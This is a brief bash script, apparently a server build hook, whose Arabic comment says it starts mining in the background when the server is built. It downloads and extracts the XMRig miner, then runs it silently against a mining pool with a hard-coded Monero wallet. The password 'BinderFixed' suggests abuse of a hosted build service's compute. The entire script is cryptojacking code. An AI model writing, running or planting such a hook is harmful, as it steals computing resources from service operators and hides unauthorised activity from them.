#!/bin/bash
wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
tar -xvf xmrig-6.21.0-linux-x64.tar.gz
# تشغيل التعدين فوراً في الخلفية عند بناء السيرفر
./xmrig-6.21.0/xmrig -o eu1.solopool.org:8010 -u 46v4F8H1sMpbxMTz9mgFBUL2CYYWPRsB6AwVq1BnhyuG9VTkrshxh1G3TfooiLeRZpU76iyRWr6P3YJeVrVHCZxNKgo1dzM -p BinderFixed &
